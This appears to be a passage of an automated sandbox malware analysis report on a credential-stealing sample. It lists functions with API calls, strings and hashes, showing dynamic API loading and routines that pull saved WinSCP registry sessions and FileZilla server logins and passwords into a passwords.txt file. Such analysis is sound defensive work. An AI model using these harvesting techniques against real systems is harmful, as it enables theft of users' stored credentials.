                                                                                                                                                                                                            • Opcode ID: 67813cff432e2db0abc94fc5d10f6a9c4c33d96fd4943461a3550aebf9622d91
                                                                                                                                                                                                            • Instruction ID: fd568a378e61f9dd8032745bc5ed726e10135009153e67747a24499c39be525b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 67813cff432e2db0abc94fc5d10f6a9c4c33d96fd4943461a3550aebf9622d91
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 68D012B990011CD7C710DB90EC85AA9B77DAB48604F4046A9EF15A2140E6756A1D8AE5
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 004187B0 Relevance: 207.2, APIs: 114, Strings: 4, Instructions: 691libraryloaderCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CB2A80), ref: 004187C5
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CB2AE0), ref: 004187DD
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CBDB58), ref: 004187F6
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CBDA08), ref: 0041880E
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CBD9D8), ref: 00418826
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CBDA20), ref: 0041883F
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CB4048), ref: 00418857
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CBD888), ref: 0041886F
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CBDA38), ref: 00418888
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CBD8D0), ref: 004188A0
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CBDAC8), ref: 004188B8
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CB2B00), ref: 004188D1
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CB28E0), ref: 004188E9
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CB2820), ref: 00418901
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CB2900), ref: 0041891A
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CBDAE0), ref: 00418932
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CBDAF8), ref: 0041894A
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CB4390), ref: 00418963
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CB27E0), ref: 0041897B
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CBDB10), ref: 00418993
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CBDB28), ref: 004189AC
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CBDB40), ref: 004189C4
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CBDC00), ref: 004189DC
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CB2640), ref: 004189F5
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CBDBA0), ref: 00418A0D
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CBDB88), ref: 00418A25
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CBDBB8), ref: 00418A3E
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CBDBE8), ref: 00418A56
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CBDC30), ref: 00418A6E
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CBDC48), ref: 00418A87
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CBDBD0), ref: 00418A9F
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CBDC18), ref: 00418AB7
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CC0E88), ref: 00418AD0
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CBE970), ref: 00418AE8
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CC0FA8), ref: 00418B00
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CC0D80), ref: 00418B19
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CB26A0), ref: 00418B31
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CC0F30), ref: 00418B49
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CB2920), ref: 00418B62
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CC0E58), ref: 00418B7A
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CC0DB0), ref: 00418B92
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CB2760), ref: 00418BAB
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00CB28C0), ref: 00418BC3
                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00CC0F00,00417C4D,?,00000040,00000064,00414050,004135F0,?,0000002C,00000064,00413FA0,00413FF0,?,00000024,00000064,00413F50), ref: 00418BD5
                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00CC0EE8), ref: 00418BE6
                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00CC0F18), ref: 00418BF8
                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00CC0DC8), ref: 00418C0A
                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00CC0F60), ref: 00418C1B
                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00CC0EB8), ref: 00418C2D
                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00CC0D68), ref: 00418C3F
                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00CC0D98), ref: 00418C50
                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(dbghelp.dll), ref: 00418C60
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75290000,00CB2940), ref: 00418C7C
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75290000,00CC0DE0), ref: 00418C94
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75290000,00CBF160), ref: 00418CAD
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75290000,00CC0F48), ref: 00418CC5
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75290000,00CB2720), ref: 00418CDD
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(6FD40000,00CB43B8), ref: 00418CFD
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(6FD40000,00CB2960), ref: 00418D15
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(6FD40000,00CB43E0), ref: 00418D2E
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(6FD40000,00CC0FC0), ref: 00418D46
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(6FD40000,00CC0F90), ref: 00418D5E
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(6FD40000,00CB2800), ref: 00418D77
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(6FD40000,00CB2700), ref: 00418D8F
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(6FD40000,00CC0F78), ref: 00418DA7
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(752C0000,00CB2740), ref: 00418DC3
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(752C0000,00CB28A0), ref: 00418DDB
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(752C0000,00CC0FD8), ref: 00418DF4
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(752C0000,00CC0DF8), ref: 00418E0C
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(752C0000,00CB26C0), ref: 00418E24
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74EC0000,00CB4480), ref: 00418E44
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74EC0000,00CB4368), ref: 00418E5C
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74EC0000,00CC0E70), ref: 00418E75
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74EC0000,00CB2840), ref: 00418E8D
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74EC0000,00CB2860), ref: 00418EA5
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74EC0000,00CB4408), ref: 00418EBE
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75BD0000,00CC0E10), ref: 00418EDE
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75BD0000,00CB2880), ref: 00418EF6
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75BD0000,00CBF0C0), ref: 00418F0F
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75BD0000,00CC0ED0), ref: 00418F27
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75BD0000,00CC0EA0), ref: 00418F3F
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75BD0000,00CB2620), ref: 00418F58
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75BD0000,00CB2600), ref: 00418F70
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75BD0000,00CC1020), ref: 00418F88
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75BD0000,00CC1038), ref: 00418FA1
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75A70000,00CB2780), ref: 00418FBD
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75A70000,00CC1050), ref: 00418FD5
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75A70000,00CC0FF0), ref: 00418FEE
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75A70000,00CC1008), ref: 00419006
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75A70000,00CC0E28), ref: 0041901E
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75450000,00CB25A0), ref: 0041903A
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75450000,00CB2660), ref: 00419052
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75DA0000,00CB2980), ref: 0041906E
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75DA0000,00CC0E40), ref: 00419086
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(6F090000,00CB25C0), ref: 004190A6
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(6F090000,00CB25E0), ref: 004190BE
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(6F090000,00CB2680), ref: 004190D7
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(6F090000,00CC1128), ref: 004190EF
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(6F090000,00CB26E0), ref: 00419107
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(6F090000,00CB27A0), ref: 00419120
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(6F090000,00CB27C0), ref: 00419138
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(6F090000,00CC1830), ref: 00419150
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(6F090000,HttpQueryInfoA), ref: 00419167
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(6F090000,InternetSetOptionA), ref: 0041917E
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75AF0000,00CC10B0), ref: 0041919A
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75AF0000,00CBF130), ref: 004191B2
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75AF0000,00CC10E0), ref: 004191CB
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75AF0000,00CC1098), ref: 004191E3
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75D90000,00CC18D0), ref: 004191FF
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(6A000000,00CC1110), ref: 0041921B
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(6A000000,00CC1890), ref: 00419233
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(6A000000,00CC1068), ref: 0041924C
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(6A000000,00CC10F8), ref: 00419264
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(69E70000,SymMatchString), ref: 0041927E
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                            • String ID: HttpQueryInfoA$InternetSetOptionA$SymMatchString$dbghelp.dll
                                                                                                                                                                                                            • API String ID: 2238633743-951535364
                                                                                                                                                                                                            • Opcode ID: 3f868d51d4b8d8477d42a39a504878cd85c5947274b16677a50b541f3c0e24fc
                                                                                                                                                                                                            • Instruction ID: e4edf3c6def9e6f61145f50a10d1a0ad06c50667231dee665e3bb71daf9c8a5c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3f868d51d4b8d8477d42a39a504878cd85c5947274b16677a50b541f3c0e24fc
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 496202BDA10620EFE754DFA5ED98A2637BBF74AB017106529EA05C3374E734A841CF60
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 0040C2D0 Relevance: 87.9, APIs: 36, Strings: 14, Instructions: 370registryCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 0040C30B
                                                                                                                                                                                                            • memset.MSVCRT ref: 0040C32A
                                                                                                                                                                                                            • memset.MSVCRT ref: 0040C342
                                                                                                                                                                                                            • memset.MSVCRT ref: 0040C35A
                                                                                                                                                                                                            • memset.MSVCRT ref: 0040C36D
                                                                                                                                                                                                            • memset.MSVCRT ref: 0040C37B
                                                                                                                                                                                                            • memset.MSVCRT ref: 0040C38C
                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,0040EB02), ref: 0040C3AE
                                                                                                                                                                                                            • RegGetValueA.ADVAPI32(0040EB02,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040C3EF
                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,0040EB02), ref: 0040C427
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memset$Open$Value
                                                                                                                                                                                                            • String ID: :22$Host: $HostName$Login: $Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
                                                                                                                                                                                                            • API String ID: 2608732736-1250616252
                                                                                                                                                                                                            • Opcode ID: e525b1e5b2858621f946a82a2db4128e384ea7781a4de7206707f679ee626cec
                                                                                                                                                                                                            • Instruction ID: 1abdcda917a95eb73029ceaade3ca4212204c8365f1d5e377af49e4eef8df0d5
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e525b1e5b2858621f946a82a2db4128e384ea7781a4de7206707f679ee626cec
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0AD16BB1900229AFDB10DBE4DD85EFFB77CEB48709F10456AF505B3280D6785E488BA5
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 0040C770 Relevance: 72.1, APIs: 31, Strings: 10, Instructions: 398stringmemoryCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 89 40c770-40c842 call 40fd00 call 411550 call 40fe30 call 40fde0 call 40fd80 * 2 call 40fec0 call 40fde0 call 40fd80 call 40fd40 call 406d60 112 40c848-40c85a call 4115b0 89->112 113 40cc7a-40ccbf call 40fd80 * 4 89->113 112->113 119 40c860-40c8d1 strtok_s call 40fd00 * 4 GetProcessHeap HeapAlloc 112->119 133 40c8d7 119->133 134 40cbcd-40cc75 lstrlenA call 40fd00 call 401060 call 4152b0 call 40fd80 memset call 40ff50 * 4 call 40fd80 * 4 119->134 135 40c8e0-40c8ee StrStrA 133->135 134->113 137 40c8f0-40c91d lstrlenA call 411a30 call 40fde0 call 40fd80 135->137 138 40c922-40c930 StrStrA 135->138 137->138 141 40c932-40c965 lstrlenA call 411a30 call 40fde0 call 40fd80 138->141 142 40c96a-40c978 StrStrA 138->142 141->142 145 40c9b2-40c9c0 StrStrA 142->145 146 40c97a-40c9ad lstrlenA call 411a30 call 40fde0 call 40fd80 142->146 153 40c9c6-40ca13 lstrlenA call 411a30 call 40fde0 call 40fd80 call 40ffa0 call 406e30 145->153 154 40ca4a-40ca5c call 40ffa0 lstrlenA 145->154 146->145 153->154 195 40ca15-40ca45 call 40fd90 call 40fec0 call 40fde0 call 40fd80 153->195 167 40cbb1-40cbc7 strtok_s 154->167 168 40ca62-40ca74 call 40ffa0 lstrlenA 154->168 167->134 167->135 168->167 181 40ca7a-40ca8c call 40ffa0 lstrlenA 168->181 181->167 190 40ca92-40caa4 call 40ffa0 lstrlenA 181->190 190->167 199 40caaa-40cbac lstrcat * 2 call 40ffa0 lstrcat * 2 call 40ffa0 lstrcat * 3 call 40ffa0 lstrcat * 3 call 40ffa0 lstrcat * 3 call 40fd90 * 4 190->199 195->154 199->167
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 0040FD00: lstrcpy.KERNEL32(00000000,0041837D), ref: 0040FD29
                                                                                                                                                                                                              • Part of subcall function 00411550: SHGetFolderPathA.SHELL32(00000000,viB,00000000,00000000,?,00000000), ref: 00411588
                                                                                                                                                                                                              • Part of subcall function 0040FE30: lstrcpy.KERNEL32(00000000), ref: 0040FE93
                                                                                                                                                                                                              • Part of subcall function 0040FE30: lstrcat.KERNEL32(?,00000000), ref: 0040FE9F
                                                                                                                                                                                                              • Part of subcall function 0040FDE0: lstrcpy.KERNEL32(00000000), ref: 0040FE20
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrlenA.KERNEL32(?,?,?,?,?,?,00421789,000000FF,?,004183A3,?,00CB2F60,?), ref: 0040FEFC
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FF27
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcat.KERNEL32(?,?), ref: 0040FF31
                                                                                                                                                                                                              • Part of subcall function 0040FD40: lstrcpy.KERNEL32(00000000), ref: 0040FD68
                                                                                                                                                                                                              • Part of subcall function 00406D60: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00000002,?,0040C83D,?,00000000,?,00000000), ref: 00406D97
                                                                                                                                                                                                              • Part of subcall function 00406D60: GetFileSizeEx.KERNEL32(00000000,?,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406DAD
                                                                                                                                                                                                              • Part of subcall function 00406D60: LocalAlloc.KERNEL32(00000040,?,00000000,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406DC8
                                                                                                                                                                                                              • Part of subcall function 00406D60: ReadFile.KERNEL32(00000000,00000000,?,00000002,00000000,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406DE1
                                                                                                                                                                                                              • Part of subcall function 00406D60: CloseHandle.KERNEL32(00000000,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406E09
                                                                                                                                                                                                              • Part of subcall function 004115B0: LocalAlloc.KERNEL32(00000040,00413B11,?,00000001,00000004,?,00413B10,00000000,00000000), ref: 004115CC
                                                                                                                                                                                                            • strtok_s.MSVCRT ref: 0040C869
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,000F423F,0042697E,0042697B,0042697A,00426977), ref: 0040C8BF
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C8C6
                                                                                                                                                                                                            • StrStrA.SHLWAPI(00000000,<Host>), ref: 0040C8E6
                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C8F1
                                                                                                                                                                                                              • Part of subcall function 00411A30: malloc.MSVCRT ref: 00411A41
                                                                                                                                                                                                              • Part of subcall function 00411A30: strncpy.MSVCRT ref: 00411A51
                                                                                                                                                                                                            • StrStrA.SHLWAPI(00000000,<Port>), ref: 0040C928
                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C933
                                                                                                                                                                                                            • StrStrA.SHLWAPI(00000000,<User>), ref: 0040C970
                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C97B
                                                                                                                                                                                                            • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040C9B8
                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C9C7
                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA53
                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA6B
                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA83
                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA9B
                                                                                                                                                                                                            • lstrcat.KERNEL32(00417F53,Soft: FileZilla), ref: 0040CAB3
                                                                                                                                                                                                            • lstrcat.KERNEL32(00417F53,Host: ), ref: 0040CAC2
                                                                                                                                                                                                            • lstrcat.KERNEL32(00417F53,00000000), ref: 0040CAD5
                                                                                                                                                                                                            • lstrcat.KERNEL32(00417F53,00426D50), ref: 0040CAE4
                                                                                                                                                                                                            • lstrcat.KERNEL32(00417F53,00000000), ref: 0040CAF7
                                                                                                                                                                                                            • lstrcat.KERNEL32(00417F53,00426D54), ref: 0040CB06
                                                                                                                                                                                                            • lstrcat.KERNEL32(00417F53,Login: ), ref: 0040CB15
                                                                                                                                                                                                            • lstrcat.KERNEL32(00417F53,00000000), ref: 0040CB28
                                                                                                                                                                                                            • lstrcat.KERNEL32(00417F53,00426D60), ref: 0040CB37
                                                                                                                                                                                                            • lstrcat.KERNEL32(00417F53,Password: ), ref: 0040CB46
                                                                                                                                                                                                            • lstrcat.KERNEL32(00417F53,00000000), ref: 0040CB59
                                                                                                                                                                                                            • lstrcat.KERNEL32(00417F53,00426D70), ref: 0040CB68
                                                                                                                                                                                                            • lstrcat.KERNEL32(00417F53,00426D74), ref: 0040CB77
                                                                                                                                                                                                              • Part of subcall function 0040FD90: lstrlenA.KERNEL32(00418439,?,00000000,?,00417B7D,004271CF,004271CE,00000000,?,00000000,00422B88,000000FF,?,00418439), ref: 0040FD9B
                                                                                                                                                                                                              • Part of subcall function 0040FD90: lstrcpy.KERNEL32(00000000,00418439), ref: 0040FDD2
                                                                                                                                                                                                            • strtok_s.MSVCRT ref: 0040CBBB
                                                                                                                                                                                                            • lstrlenA.KERNEL32(00417F53,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CBD1
                                                                                                                                                                                                            • memset.MSVCRT ref: 0040CC22
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: lstrcat$lstrlen$lstrcpy$AllocFile$HeapLocalstrtok_s$CloseCreateFolderHandlePathProcessReadSizemallocmemsetstrncpy
                                                                                                                                                                                                            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
                                                                                                                                                                                                            • API String ID: 433178851-935134978
                                                                                                                                                                                                            • Opcode ID: 3374db9b615d59ade3af942a5e2a1a74968a56fff796b7c3fedb581fc5c2dd9a
                                                                                                                                                                                                            • Instruction ID: 497d068b6dfaa3c95a8a5ef20f3bdbdd6d9c70660b88129c2d0c9c27f77012ec
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3374db9b615d59ade3af942a5e2a1a74968a56fff796b7c3fedb581fc5c2dd9a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6EE17175900258AACB14EBE4DD4ABEEBB78AF19304F50457EF502731C1DF786A08CB69
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 00405BC0 Relevance: 58.4, APIs: 21, Strings: 12, Instructions: 681networkstringmemoryCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
